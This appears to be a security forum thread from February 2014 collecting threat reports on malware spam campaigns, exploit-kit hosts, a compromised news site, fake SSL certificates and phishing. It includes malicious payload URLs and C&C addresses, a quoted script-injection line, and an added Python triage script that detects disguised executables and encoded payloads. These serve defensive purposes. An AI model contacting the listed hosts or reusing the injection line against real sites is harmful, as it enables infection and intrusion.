... this thing comes with a malicious payload. Attached to the message is an archive Reference.zip which in turn contains a malicious executable Reference.scr (a plain old executable, not a screensaver). This has a VirusTotal detection rate of 2/50*. Automated analysis tools... show an encrypted file** being downloaded from:
[donotclick]wahidexpress .com/scripts/ie.enc
[donotclick]bsitacademy .com/img/events/ie.enc
Recommended blocklist:
182.18.188.191
wahidexpress .com
bsitacademy .com
* https://www.virustotal.com/en-gb/file/09ce8ef13352da070dfb23f10fde53fa8d5f0484b71a58a8a94b31cec017cbc9/analysis/1391686048/

** http://blog.crysys.hu/2014/02/gameover-zeus-now-uses-encryption-to-bypass-perimeter-security-enc-encryption/

Update: A -second- version of the email is circulating with the following body text:
The submission for reference 485/GB1392709 was successfully received and was not
processed.
Check attached copy for more information.
This is an automatically generated email. Please do not reply as the email address is not
monitored for received mail.
___

Fake "TNT UK Limited" SPAM - zero detections
- http://blog.dynamoo.com/2014/02/fake-tnt-uk-limited-spam-with-zero.html
6 Feb 2014 - "This -fake- TNT spam comes with a malicious attachment that is currently not detected by any AV vendors.
Date: Thu, 6 Feb 2014 11:48:18 +0100 [05:48:18 EST]
From: TNT COURIER SERVICE [tracking@ tnt .co .uk]
Subject: TNT UK Limited - Package tracking 798950432737
Your package have been picked up and is ready for dispatch.
Connote # : 798950432737
Service Type : Export Non Documents - Intl
Shipped on : 05 Feb 14 00:00
Order No : 2819122
Status : Driver's Return Description : Wrong Address
Service Options: You are required to select a service option below.
TNT COURIER SERVICE (TCS)
Customer/Delivery Services Department
Central Pk Est/Mosley Rd, Trafford Park
Manchester, M17 1TT UK.
DETAILS OF PACKAGE
Reg order no: 798950432737
The options, together with their associated conditions...

Attached is a file Label_798950432737.zip which contains a malicious executable Label02062014.scr (an executable despite the .scr extension) with a VirusTotal detection rate of 0/41*. Despite the zero detection rate, there is plenty of badness going on... including downloads of an encrypted file from the following locations:
[donotclick]newz24x .com/wp-content/uploads/2014/02/pdf.enc
[donotclick]oilwellme .com/images/banners/pdf.enc
The Malwr report** indicates lots of IPs being communicated with, some of these look like Cloudflare addresses where newz24x .com is hosted. Take care with these if you are thinking about blocking them.
Recommended blocklist:
182.18.151.160
newz24x .com
oilwellme .com "
* https://www.virustotal.com/en-gb/file/5851cc57795437db1c8788d6c8e649ab4f5a4da96e2edad30463a2658cf64135/analysis/1391684255/

** https://malwr.com/analysis/N2UyOTljMzhlMTMwNDY2ZjkzN2Y4MWUxZGU3YTljNDk/
___

Visa/MasterCard Important Notification Spam
- http://threattrack.tumblr.com/post/75813534725/visa-mastercard-important-notification-spam
Feb 6, 2014 - "Subjects Seen:
ATTN: Important notification for a Visa / MasterCard holder!
Typical e-mail details:
Dear <email name>, Your Bank debit card has been temporarily blocked
We’ve detected unusual activity on your Bank debit card . Your debit card has been temporarily blocked, please fill document in attachment and contact us

Malicious File Name and MD5:
<email name>_Account_Report_7552804B13.zip (F08171CEF69EFD04CFC0F525ABD862FD)
PDF_Account_Details_User_543857394652798346597456987235986498756234798573280945-4353452345-32453245324532-45.pdf.exe (A1E61D4628E8381F47CE2E8424410A39)

Screenshot: https://31.media.tumblr.com/0eb34e8b214e15559e9de99e1968a9c8/tumblr_inline_n0l7oel4t81r6pupn.png

Tagged: Visa, MasterCard, Tepfer
___

Swedish newssite compromised - Fake AV
- http://bartblaze.blogspot.com/2014/02/swedish-newssite-compromised.html
Feb 6, 2014 - "... a Swedish and well-visited newssite, AftonBladet (http ://www .aftonbladet .se), was -compromised- and serving visitors a fake antivirus or rogueware. There are two possibilities as to the cause:
- A (rotating) ad where malicious Javascript was injected
- AftonBladet itself had malicious Javascript injected
Whoever the cause, the injected script may have been as simple as:
document.write('< script src=http ://http ://www .aftonbladet .se/article/mal.php');
When trying to reproduce, it appeared it already was cleaned up, fast actions there...
File: svc-ddrs.exe
Image icon: https://lh3.ggpht.com/-edoZpNtfHHg/UvOQUTMDFkI/AAAAAAAAA3U/yuEdOGlC6Ok/s1600/1.png
Size: 1084416 bytes
Type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
MD5: be886eb66cc39b0bbf3b237b476633a5
SHA1: 36c3671f37f414ad6e0954e094a1a7bd0dcc34fc
ssdeep: 24576:M2xJbbGmTvmN9BfQ0lc4Bt4Xsk2QkibF5BOWe8JH0:M6bb3MQ0lc434n2Qhh5kWe8JU
Date: 0x52F1C3E1 [Wed Feb 5 04:53:53 2014 UTC]
EP: 0x5a8090 UPX1 1/3 [SUSPICIOUS]
CRC: Claimed: 0x0, Actual: 0x10eeb0 [SUSPICIOUS]
Packers: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
VirusTotal: https://www.virustotal.com/en-gb/file/ee2107d3d4fd2cb3977376b38c15baa199f04f258263ca7e98cb28afc00d2dd0/analysis/
Anubis: http://anubis.iseclab.org/?action=result&task_id=12dc4daced1762174cdfa58df0872aae2&format=html
When executing the sample: Windows Efficiency Master:
> https://lh3.ggpht.com/-Gvb7kJhW-4Y/UvORtOSDp-I/AAAAAAAAA3k/9wPHFmiTPFw/s1600/fakeav2.PNG
Fake scanning results:
> https://lh3.ggpht.com/-N53YX8RSsCg/UvORsyLe8oI/AAAAAAAAA3g/EP6pDyeb9F8/s1600/FakeAV.PNG
Besides dropping the usual EXE file in the %appdata% folder, it also drops a data.sec file with predefined scanning results (all fake obviously). Here's a pastebin with the contents of data.sec: http://pastebin.com/DCtDWEbi
It also performs the usual actions:
- Usual blocking of EXE and other files
- Usual blocking of browser like Internet Explorer
- Callback to 93.115.86.197 C&C
- Stops several antivirus services and prevents them from running
- Reboots initially to stop certain logging and monitoring tools
- Uses mshta.exe (which executes HTML application files) for the usual payment screen
- Packed with UPX, so fairly easy to unpack
- Connects to http ://checkip .dyndns .org/ to determine -your- IP
This rogueware or fake AV belongs to the Tritax family, which has been going around for quite some time and has lots and lots of different names, but the design, concept and initial social engineering attack are all the same... an excellent post on this family, which you can read here:
> http://blog.0x3a.com/post/75474731248/analysis-of-the-tritax-fakeav-family-their-active
Prevention: In this case, no exploit -nor Java/Adobe, nor browser- was used. Only Javascript was injected. Install an antivirus and antimalware product and keep it up-to-date & running. Use NoScript in Firefox or NotScripts in Chrome. -Block- the above IP...
Disinfection: Perform a full scan with your installed antivirus and a scan with another antivirus or antimalware product. You can check on VirusTotal which antivirus applications already detect this malware. If you are having issues doing this, reboot your machine in Safe Mode and remove the malware..."
___

Payroll Report Spam
- http://threattrack.tumblr.com/post/75690172079/payroll-report-spam
Feb 5, 2014 - "Subjects Seen:
Jan Report
Typical e-mail details:
Hello ,
Please find attached reports for this year for checking.
Please could you sign the BACs form and return it as your approval that I am to go ahead with the transmission.
Kind regards
Wilton
Payroll Manager

Malicious File Name and MD5:
January.zip (F261B2109FD733559191CCCB7DEC79F8)
January.scr (811AD8F76AD489BAF15DB72306BD9F34)

Screenshot: https://31.media.tumblr.com/97e3ccd0fe0239fd42eb28d8c7e5c4c7/tumblr_inline_n0j10oxUm21r6pupn.png

Tagged: Payroll, Upatre
___

Fake "Payment Fund" SPAM - Wire.Transfer.rar attachment
- http://blog.dynamoo.com/2014/02/payment-fund-spam-with-wiretransferrar.html
5 Feb 2014 - "It's rare to see malware with a .RAR attachment, but this is one of those unusual beasts..
From: Alison George allison.george@ transferduc .nl
Date: 5 February 2014 22:41
Subject: Payment Fund
ALERT! A bank Wire transaction, Has just been rejected from checking 656778*** account.
to your bank confirmed by the FedWire.
Transaction ID: 99076900
Date: 2/3/2014
Transfer Origination: Fedline
Please review the attached copy of transaction report,
Federal Reserve Financial Services
Creating Nationwide Solutions for Your Payment Needs
20th Street and Constitution Avenue N.W.
Washington, D.C. 20551

Attached is a file Wire.Transfer.rar which you will need to unpack with a suitable application. In turn this creates a file Wire-Report which is actually an executable, but missing the .exe extension.. so you have to add that to get infected. Hmmm.. the phrase "some assembly required" springs to mind. The VirusTotal detection rate is 7/50* but most automated analysis tools seem to be having problems with the executable, so perhaps it is hardened against analysis or is simply corrupt. The ThreatExpert report (for some reason -not- showing in their database right now) has the following details:
Submission Summary:
Submission details:
Submission received: 5 February 2014, 04:39:38 PM
Processing time: 6 min 0 sec
Submitted sample:
File MD5: 0x12F1265162AAD712C271DAC6A9B5E564
Filesize: 248,320 bytes
Summary of the findings:
What's been found Severity Level
Creates a startup registry entry.
Technical Details:
Memory Modifications
There was a new process created in the system:
Process Name Process Filename Main Module Size
server.exe %Temp%\server.exe 57,344 bytes
Registry Modifications
The newly created Registry Values are:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
babe8364d0b44de2ea6e4bcccd70281e = ""%Temp%\server.exe" .."
so that %Temp%\server.exe runs every time Windows starts
[HKEY_CURRENT_USER\Environment]
SEE_MASK_NOZONECHECKS = "1"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
5PmM1jWi05 = "%AppData%\y183imD2\java.exe.lnk"
babe8364d0b44de2ea6e4bcccd70281e = ""%Temp%\server.exe" .."
so that %Temp%\server.exe runs every time Windows starts
Other details
To mark the presence in the system, the following Mutex object was created:
babe8364d0b44de2ea6e4bcccd70281e "
* https://www.virustotal.com/en-gb/file/61a58853545ccb8b8b01f6a2a37a9cc332b5a5de57c6be03a4ee40fd0ab92d48/analysis/1391640427/

:fear: :mad:
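Attachment triage by content rather than filename, as an added example for this thread (not code from dynamoo.com, Gary Warner or Malcovery): it covers the GameOver/Upatre .enc downloads quoted above that begin with "ZZP" instead of the "MZ" every Windows executable starts with, and the .scr, extensionless (Wire-Report) and double-extension (.pdf.exe) attachments in the posts above. The PE header stub, the ZIP archive and the sample filenames are constructed here.

```python
"""Content-based attachment triage (added example, not the blog authors' code).

A mail gateway or web filter that trusts the filename misses the cases quoted in
this thread; classifying the bytes themselves catches them all the same way.
"""
import io
import struct
import zipfile

PE_MAGIC = b"MZ"
ENC_MAGIC = b"ZZP"  # leading bytes reported on the GameOver/Upatre .enc downloads

# Extensions Windows will run directly; .scr is a screensaver but is loaded as a PE.
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".cpl"}
# Document/image extensions used as the decoy half of a double extension.
DECOY_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".txt"}


def is_pe(data: bytes) -> bool:
    """True when data has a DOS header whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != PE_MAGIC:
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def split_extensions(filename: str) -> list:
    """Return every extension after the base name, lower-cased, e.g. ['.doc', '.exe']."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    return ["." + p for p in parts[1:] if p]


def triage(filename: str, data: bytes) -> set:
    """Return a set of reason tags; an empty set means nothing suspicious was found."""
    tags = set()
    exts = split_extensions(filename)
    last = exts[-1] if exts else ""
    if is_pe(data):
        tags.add("pe-content")
        if not exts:
            tags.add("pe-without-extension")        # the 'Wire-Report' case
        elif last not in EXECUTABLE_EXTENSIONS:
            tags.add("pe-with-misleading-extension")
    if last in EXECUTABLE_EXTENSIONS:
        tags.add("executable-extension")            # .scr counts, whatever its icon
        if any(e in DECOY_EXTENSIONS for e in exts[:-1]):
            tags.add("double-extension")            # the '.pdf.exe' case
    if last == ".enc" and data.startswith(ENC_MAGIC):
        tags.add("zzp-encoded-payload")             # not MZ, so PE-only filters pass it
    return tags


def triage_zip(data: bytes) -> dict:
    """Triage every member of an in-memory ZIP, keyed by member name."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.is_dir():
                results[info.filename] = triage(info.filename, zf.read(info))
    return results


def make_pe_stub() -> bytes:
    """Constructed PE-shaped header for testing only; it is not a runnable program."""
    dos = bytearray(0x40)
    dos[:2] = PE_MAGIC
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew -> right after the DOS header
    return bytes(dos) + b"PE\0\0" + b"\0" * 20


def make_zip(members: dict) -> bytes:
    """Constructed ZIP archive from {name: bytes}, standing in for a mail attachment."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, payload in members.items():
            zf.writestr(name, payload)
    return buf.getvalue()


if __name__ == "__main__":
    stub = make_pe_stub()
    # Constructed samples modelled on the filenames quoted in this thread.
    attachment = make_zip({"SecureMessage.scr": stub})
    for name, tags in triage_zip(attachment).items():
        print(name, sorted(tags))
    print(sorted(triage("Wire-Report", stub)))
    print(sorted(triage("pdf.enc", b"ZZP" + b"\x13" * 40)))
    print(sorted(triage("Account_Details.pdf.exe", stub)))
    print(sorted(triage("report.pdf", b"%PDF-1.4 ...")))
```

The ZZP check is only as good as the header the current campaign uses, so it belongs alongside the PE check rather than replacing it.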

AplusWebMaster
2014-02-07, 14:26
FYI...

Something evil on 69.64.39.166
- http://blog.dynamoo.com/2014/02/something-evil-on-696439166.html
7 Feb 2014 - "69.64.39.166 (Hosting Solutions International, US) appears to be hosting an exploit kit (possibly Fiesta*) according to URLquery reports such as this one**. The code is being -injected- into target websites, possibly through a malvertising campaign. I would recommend blocking the IP address as the simplest option, although I can identify the following domains on that same IP, all of which are likely to be malicious..."
(Long list of URLs at the dynamoo URL above.)
* http://blog.0x3a.com/post/62375513265/fiesta-exploit-kit-analysis-serving-msie-exploit

** http://urlquery.net/report.php?id=9258190

- https://www.virustotal.com/en/ip-address/69.64.39.166/information/
___

Fake rbs .co .uk "Important Docs" SPAM
- http://blog.dynamoo.com/2014/02/rbscouk-important-docs-spam.html
7 Feb 2014 - "This -fake- spam claiming to be from the Royal Bank of Scotland has a malicious attachment:
Date: Fri, 7 Feb 2014 15:44:19 +0530 [05:14:19 EST]
From: Doris Clay [Doris@ rbs .co .uk]
Subject: Important Docs
Account report.
Tel: 01322 589422
Fax: 01322 296116
email: Doris@rbs .co .uk
This information is classified as Confidential unless otherwise stated.
CONFIDENTIAL NOTICE: The contents of this message, including any attachments, are
confidential and are intended solely for the use of the person or entity to whom the
message was addressed. If you are not the intended recipient of this message, please be
advised that any dissemination, distribution, or use of the contents of this message is
strictly prohibited. If you received this message in error, please notify the sender.
Please also permanently delete all copies of the original message and any attached
documentation. Thank you.

Attached is a file AccountReport.zip which in turn contains a malicious executable AccountReport.scr which has a VirusTotal detection rate of 4/50*. Automated analysis tools... show a download of an encrypted file from the following locations:
[donotclick]professionalonlineediting .com/theme/cc/images/07UKex.enc
[donotclick]mararu .ro/Media/07UKex.enc
Both those sites are hosted by Mochanin Corp in the US, indicating perhaps a wider problem with that host.
Recommended blocklist:
204.93.165.33
50.31.147.54
professionalonlineediting .com
mararu .ro "
* https://www.virustotal.com/en-gb/file/3bad82849b284c4db1834aca6674faec5577e2b5858510b8b74880b7d214fd08/analysis/1391768230/

- http://threattrack.tumblr.com/post/75930437470/rbs-bank-spam
Feb 7, 2014 - "Subjects Seen:
Important Docs
Typical e-mail details:
Account report.
Tel: 01322 052736
Fax: 01322 513203
email: Trenton@ rbs .co .uk
This information is classified as Confidential unless otherwise stated.

Malicious File Name and MD5:
AccountReport.zip (0D143292B014E22DEE91930C488CBCE0)
AccountReport.scr (61DF278485C8012E5B2D86F825E12D0D)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/d7bdb172dfd9862adf3132aeba2be8d4/tumblr_inline_n0nbbdYk421r6pupn.png

Tagged: RBS, Upatre
___

Fake Authorization SPAM
- http://blog.dynamoo.com/2014/02/authorization-to-use-privately-owned.html
7 Feb 2014 - "We've seen this particular type of malware-laden spam before..
Date: Fri, 7 Feb 2014 17:08:16 +0700 [05:08:16 EST]
From: Callie Figueroa [Callie@ victimdomain]
Subject: Annual Form - Authorization to Use Privately Owned Vehicle on State Business
All employees need to have on file this form STD 261 (attached). The original is
retained by supervisor and copy goes to Accounting. Accounting need this form to approve mileage reimbursement.
The form can be used for multiple years, however it needs to re-signed annually by
employee and supervisor.
Please confirm all employees that may travel using their private car on state business
(including training) has a current STD 261 on file. Not having a current copy of this
form on file in Accounting may delay a travel reimbursement claim.

The email appears to originate from within the victim's own domain but doesn't. Attached is an archive file Form_STD261.zip which in turn contains a malicious executable Form_STD261.scr which has a VirusTotal detection rate of just 3/51*. Anubis reports** an attempted connection to faneema .com on 198.38.82.223 (Mochahost, US). I recommend blocking both the domain and IP address in this case.
* https://www.virustotal.com/en-gb/file/0516c5b7168d16d6c2f82ae6bf57d1acbafe4b2fa30a33055f7a848bf3ac5b8f/analysis/1391770188/

** http://anubis.iseclab.org/?action=result&task_id=18be1565e6a6c96a4e155daf0c9fe792b&format=html

:mad: :fear:

AplusWebMaster
2014-02-10, 14:56
FYI...

Evil .pw domains on 31.41.221.131 to 31.41.221.135
- http://blog.dynamoo.com/2014/02/something-evil-on-3141221131-to.html
10 Feb 2014 - "Thanks to Malekal for the heads up*, the current batch of evil .pw domains that have been distributing malware appear to have shifted to the following IP addresses:
31.41.221.131
31.41.221.132
31.41.221.133
31.41.221.134
31.41.221.135
These IP addresses belong to Besthosting in Ukraine. A typical payload of one of these malicious sites looks like this URLquery report**.
The evil .pw domains in use all use a subdomain of one of the following:
(Long list at the dynamoo URL above)
I would recommend blocking those domains and the above-listed IPs (or alternatively 31.41.221.128/29 or 31.41.221.128/25). A full list of all the subdomains I can find is here [pastebin]***"
* https://twitter.com/malekal_morte/status/432804655374938112

** http://urlquery.net/report.php?id=9308286

*** http://pastebin.com/xSHmpKQR
___

81.4.106.132 / oochooch .com / 10qnbkh .xip .io
- http://blog.dynamoo.com/2014/02/814106132-oochoochcom-10qnbkhxipio.html
10 Feb 2014 - "... don't like the look of this, seems to be the payload site for some sort of injection attack. Might be worth blocklisting 81.4.106.132 **...
> https://lh3.ggpht.com/-_KGxwVddVxI/UvjaWxkUaUI/AAAAAAAACkM/PdORyIs_M00/s1600/oochooch.png "

* http://urlquery.net/search.php?q=81.4.106.132&type=string&start=2014-01-26&end=2014-02-10&max=50

** https://www.virustotal.com/en/ip-address/81.4.106.132/information/
___

Malicious Android apps hit 10 million ...
- http://www.theinquirer.net/inquirer/news/2327881/malicious-android-apps-hit-the-10-million-mark
Feb 10, 2014 - "The Android operating system (OS) has over 10 million malicious apps, security firm Kaspersky has warned in its latest report. In the Kaspersky Security Bulletin 2013, researchers said that by late January 2014 they had found 200,000 unique samples of mobile malware at the Google Play store and other sources, which get re-used and re-packaged to look like different apps... (cybercriminals used 10,604,273 unique hosts)... Kaspersky said in its report*... in most cases, malware targets the user's financial information**..."
* https://www.securelist.com/en/analysis/204792318/Kaspersky_Security_Bulletin_2013_Overall_statistics_for_2013#09

** https://www.securelist.com/en/analysis/204792318/Kaspersky_Security_Bulletin_2013_Overall_statistics_for_2013#02

Corporate Threats: Target organizations
- https://www.securelist.com/en/analysis/204792317/Kaspersky_Security_Bulletin_2013_Corporate_threats#01

:fear: :mad:

AplusWebMaster
2014-02-11, 18:42
FYI...

TrendMicro 2013 report
- http://blog.trendmicro.com/trendlabs-security-intelligence/2013-security-roundup/
Feb 11, 2014 - "... We saw almost a -million- new banking malware variants, which was double what we saw in 2012. Much of this growth occurred in the latter half of the year:
Volume of new banking malware
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/02/2013roundup1.jpg
Two countries – the United States and Brazil – accounted for half of all banking malware victims:
Countries most affected by banking malware
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/02/2013roundup2.jpg
... CryptoLocker became as serious a problem for end users as fake antivirus malware had in previous years. The fall of the Blackhole Exploit Kit in 2013 due to the arrest of its creator... was a significant event that appreciably changed the threat landscape. It significantly cut the use of malicious links in spam messages by attackers... other exploit kits have emerged into the threat landscape since then...
Types of mobile malware threats
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/02/2013roundup4.jpg
... Attacks delivered via social media (combined with social engineering) have now become the norm, with newer social networks like Instagram, Pinterest, and Tumblr suffering from their own scams as well. Indeed, attacks on -all- social media platforms have become so common, it may almost be considered “business as usual”..."
___

NatWest Bank Credit Card Spam
- http://threattrack.tumblr.com/post/76324769715/natwest-bank-credit-card-spam
Feb 11, 2014 - "Subjects Seen:
Cards OnLine E-Statement E-Mail Notification
Typical e-mail details:
Dear Customer
Your February 11, 2014 E-Statement for account number xxxxxxxxxxxx9496 from Cards OnLine is now available.
For more information please check attached copy
Thank you
Cards OnLine

Malicious File Name and MD5:
E-Statement.zip (3B17E8E5BADF9ADB41974C2DDED1464E)
E-Statement.exe (20E7520948EE772E192127374569B219)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/91191174301594fc4b010f35720bd387/tumblr_inline_n0u51lCyrt1r6pupn.png

Tagged: NatWest, Upatre
___

'Incoming Fax Report' - Malware Email
- http://www.hoax-slayer.com/incoming-fax-report-malware-email.shtml
Feb 11, 2014 - "Email purporting to be a notification about an incoming payroll related fax claims that users can click a link to read the file online... The link in the email opens a compromised website that harbours malware. If downloaded and installed, this malware may steal information from the infected computer, make connections with remote servers operated by criminals and download further malware components. If you receive one of these fake fax emails do not click any links or open any attachments that it contains.
Example:
*********************************************************
INCOMING FAX REPORT
*********************************************************
Date/Time: 10/02/2014 05:13:13 EST
Speed: 25903 bps
Connection time: 04:08
Pages: 7
Resolution: Normal
Remote ID: 8102702342
Line number: 4
DTMF/DID:
Description: Payroll
Click here to view the file online
*********************************************************

... Those who go ahead and click the link in the hope of viewing the supposed fax file will be taken to a website that displays a 'please wait' message. The compromised site may attempt to load malicious scripts, which then redirect to a malware page. The exact configuration and payload of the malware sites may vary. Typically, however, malware downloaded from such sites may perform one or more nefarious tasks. It may harvest information from the infected computer and send it to cybercriminals. It may allow criminals to control the computer remotely and join it to a botnet. It may download and install even more malware that can perform various other functions... The criminals bank on the fact that at least a few customers of such services may click on the link without due caution. And, even people that have never used such a service may be panicked into clicking the link in the mistaken belief that their bank account has been compromised or payments have been made in their names..."

:fear: :mad:

AplusWebMaster
2014-02-12, 22:03
FYI...

Fake FedEx SPAM
- http://blog.dynamoo.com/2014/02/track-shipmentsfedex-spam.html
12 Feb 2014 - "This -fake- FedEx spam leads to malware:
Date: Wed, 12 Feb 2014 07:53:36 -0700 [09:53:36 EST]
From: FedEx [yama@ rickyz .jp]
Subject: Track shipments/FedEx 7487214609167750150131 results: Delivered
Track shipments/FedEx Office orders summary results:
Tracking number Status Date/Time
7487214609167750150131 Delivered Feb 11, 2014 11:20 AM
Track shipments/FedEx Office orders detailed results:
Tracking number 7487214609167750150131
Reference 304562545939440100902500000000
Ship date Feb 03, 2014
Ship From NEW YORK, NY
Delivery date Feb 11, 2014 11:20 AM
Service type FedEx SmartPost
Tracking results as of Feb 11, 2014 3:37 PM CST
Click Here and get Travel History ...

Screenshot: https://lh3.ggpht.com/-HHSPTBU0P1s/UvuVWCBMZuI/AAAAAAAACkc/-NKj72yFA8I/s1600/fedex2.png

In this case, the link in the email goes to [donotclick]pceninternet .net/tracking.php?id_7487214609167750150131 which downloads an archive file track_shipments_FedEx.zip. In turn, this ZIP file contains the malicious executable with the lovely name of Track_shipments_FedEx_Office_orders_summary_results_Delivered_tracking_number_9384758293431234834312_idju2f83f9hjv78fh7899382r7f9sdh8wf.doc.exe which has an icon that makes it look like a Word document. This has a VirusTotal detection rate of 15/49*, but automated analysis tools are inconclusive as to its payload..."
* https://www.virustotal.com/en-gb/file/fc959980ff4d8ad76ebf02adfab6a9ebd4bc04df213faaaa7405a579dcbcb785/analysis/1392219267/
___

Malware (Neutrino EK?) sites to block
- http://blog.dynamoo.com/2014/02/malware-neutrino-ek-sites-to-block-12214.html
12 Feb 2014 - "The following IPs and domains appear to be in use for spreading exploit kits via injection attacks - 108.178.7.118 (Singlehop, US) [1] [2] and 212.83.164.87 (Online SAS, France) [3] [4]. The payload isn't clear, but some of the URLquery reports indicate Neutrino*. In the case I saw, the victim was directed to the EK from a compromised site at greetingstext .com. I cannot reproduce the problem with URLquery or any other tool, but log files do not lie. I would recommend that you block these following IPs and domains as a precaution..." (List at the dynamoo URL above.)
1) https://www.virustotal.com/en-gb/ip-address/108.178.7.118/information/

2) http://urlquery.net/search.php?q=108.178.7.118&type=string&start=2014-01-28&end=2014-02-12&max=50

3) https://www.virustotal.com/en-gb/ip-address/212.83.164.87/information/

4) http://urlquery.net/search.php?q=212.83.164.87&type=string&start=2014-01-28&end=2014-02-12&max=50

* http://urlquery.net/report.php?id=9410080
___

In the wild: Phony SSL certificates impersonating Google, Facebook, and iTunes
- http://arstechnica.com/security/2014/02/in-the-wild-phony-ssl-certificates-impersonating-google-facebook-and-itunes/
Feb 12, 2014 - "Researchers have found dozens of fake certificates impersonating the secure sections of online banks, e-commerce sites, and social networks. Google, Facebook, iTunes, and even a POP e-mail server belonging to GoDaddy are a small sample of the services affected by the fraudulent credentials, which in some cases can allow attackers to read and modify encrypted traffic passing between end users and protected servers.
> http://cdn.arstechnica.net/wp-content/uploads/2014/02/facebook1.png
The secure sockets layer (SSL) certificates don't pose much of a threat to people using a popular Web browser to visit spoofed websites, because the credentials aren't digitally signed by a trusted certificate authority, researchers from Netcraft wrote in a blog post published Wednesday*. They went on to say that people accessing sensitive websites with smartphone apps or other non-browser software may -not- be so lucky... Many of the fake SSL certificates discovered by Netcraft were created with malicious intentions. A wildcard certificate for *.google.com suggests an attempt to spoof a variety of Google services. The fake certificate was served by a machine in Romania hosting other sites with .ro and .com domains. The phony credential claims to have been issued by America Online Root Certification Authority 42. The name closely mimics a legitimate trusted root certificate that is installed in all browsers, although it's not enough to trick them. Other fraudulent credentials masqueraded as certificates for Facebook, iTunes, and a payment service and bank located in Russia. Yet another bogus certificate covered pop.where.secureserver.net, a server address belonging to GoDaddy's POP e-mail service... given the large number of e-mail clients, smartphone apps, and other non-browser programs available, it's not a stretch to think the certificates discovered by Netcraft are fooling some people right now. You should carefully consider the source of any app that connects to an SSL-protected server before installing it, and you should -never- click through pop-up windows that warn of self-signed certificates."
* http://news.netcraft.com/archives/2014/02/12/fake-ssl-certificates-deployed-across-the-internet.html

- http://www.theregister.co.uk/2014/02/14/fake_ssl_cert_peril/
14 Feb 2014

:mad: :fear:

AplusWebMaster
2014-02-13, 13:19
FYI...

Fake MS 'Reactivate Your Email Account' Phish
- http://www.hoax-slayer.com/microsoft-reactivate-email-account-phishing-scam.shtml
Feb 13, 2014 - "Email purporting to be from Microsoft claims that recipients must click a link to complete a 'one time automatic verification' in order to avoid having their email account suspended. The email is not from Microsoft. It is a crude phishing scam designed to trick recipients into giving their email address and password to online criminals. The criminals will use the stolen data to hijack the compromised email accounts and use them to send further spam and scam messages in the names of their victims. Example:
Subject: REACTIVATE YOUR EMAIL ACCOUNT!!!
Attention;
In compliance with the email upgrade instructions from
Microsoft Corporation and WWW email domain host, all unverified email accounts would be suspended for verification.
To avoid suspension of your email account and also to retain all email Contents, please perform one time automatic verification by completing the online verification form.
Please CLICK HERE
for the online verification form.
As a confirmation of complete and successful verification, you shall be automatically be redirected to your email web page.
Please move this message to your inbox, if found in bulk folder. Please do this for all your email accounts.
Thank you.
WWW. mail Support Team.
© 2014 Microsoft Corporation.

Screenshot: http://www.hoax-slayer.com/images/microsoft-reactivate-email-scam-2014-1.jpg

According to this email, which purports to be from Microsoft, the recipient must complete a verification of his or her email account by clicking a link in the message. The message warns that all unverified email accounts will face suspension and the loss of all 'email contents' in the accounts... the email is -not- from Microsoft. It is a phishing scam designed to trick recipients into giving their email address and password to Internet criminals. Clicking the link in the fake email takes users to an equally fake site that asks for their email address, email password and date of birth. After supplying this information, users are automatically redirected away from the scam website. Meanwhile, the scammers can use the data that they have stolen to access the compromised email accounts and use them to launch further spam and scam campaigns. Since the scam emails are sent via the hijacked accounts of victims, the emails cannot be traced back to the criminals responsible... No legitimate email provider is likely to send an unsolicited email asking customers to provide their email password by clicking a link, opening an attachment or replying. Be very wary of any email that makes such a request."

:fear::fear: :mad:

AplusWebMaster
2014-02-14, 19:14
FYI...

DoubleClick malvertising campaign exposes... malvertising infrastructure
- http://www.webroot.com/blog/2014/02/14/doubleclick-malvertising-campaign-exposes-long-run-beneath-radar-malvertising-infrastructure/
Feb 14, 2014 - "... we became aware of a possible evasive/beneath the radar malvertising based g01pack exploit kit attack, taking place through the DoubleClick ad network using an advertisement featured at About .com. Investigating further, we were able to identify the actual domains/IPs involved in the campaign, and perhaps most interestingly, managed to establish a rather interesting connection between the name servers of one of the domains involved in the attacks, and what appears to be a fully operational and running Ukrainian-based ad platform, Epom in this particular case...
Malvertising domains/URLs/IPs involved in the campaign:
adservinghost1 .com – 212.124.112.232; 212.124.112.226 (known to have responded to the same IP is also cpmservice1 .com); 212.124.112.229; 74.50.103.41; 68.233.228.236
ad.onlineadserv .com – 37.59.15.44; 37.59.15.211, hxxp ://188.138.90.222 /ad.php?id=31984&cuid=55093&vf=240
IP reconnaissance:
188.138.90.222 – The following domains are also known to have responded to the same IP: rimwaserver .com; notslead .com; adwenia .com – Email: philip.woronoff@ yandex .ru (also known to have responded to 188.138.74.38 in the past; as well as digenmedia .com)
Based on BrightCloud’s database, not only is adservinghost1 .com already flagged as malicious, but also, we’re aware that MD5: dc35b211b5eb5bd8af02c412e411d40e (Rogue:Win32/Winwebsec)* is known to have phoned back to the same IP as the actual domain, hxxp ://212.124.112.232 /cb_soft.php?q=dcee08c46ea4d86769a92ab67ff5aafa in particular...
> https://www.webroot.com/blog/wp-content/uploads/2014/02/DoubleClick_Malvertising.png
Here comes the interesting part. Apparently, the name servers of adservinghost1 .com are currently responding to the same IPs as the name servers of the Epom ad platform.
NS1.ADSERVINGHOST1 .COM – 212.124.126.2
NS2.ADSERVINGHOST1 .COM – 74.50.103.38
